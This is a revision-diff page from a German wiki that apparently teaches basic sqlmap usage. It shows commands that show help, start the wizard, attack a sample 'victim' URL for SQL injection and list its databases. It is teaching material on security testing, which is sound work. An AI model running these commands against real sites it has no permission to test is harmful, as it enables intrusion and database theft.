Sqlmap Anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 6: Zeile 6:
  
 
=URL angreifen / auf Schwachstellen testen=
 
=URL angreifen / auf Schwachstellen testen=
 +
*URL je nach Struktur der interessanten Seite
 
*sqlmap www.opfer.de/index.php?id=1
 
*sqlmap www.opfer.de/index.php?id=1
 +
 
=Ausgabe der Datenbanken - falls angreifbar=
 
=Ausgabe der Datenbanken - falls angreifbar=
 
*sqlmap www.opfer.de/index.php?id=1 --dbs
 
*sqlmap www.opfer.de/index.php?id=1 --dbs

Version vom 12. August 2021, 14:23 Uhr

Augabe aller Parameter und Optionen

  • sqlmap -hh

Aufruf des Wizards

  • geführt und interaktiv
  • sqlmap --wizard

URL angreifen / auf Schwachstellen testen

  • URL je nach Struktur der interessanten Seite
  • sqlmap www.opfer.de/index.php?id=1

Ausgabe der Datenbanken - falls angreifbar

  • sqlmap www.opfer.de/index.php?id=1 --dbs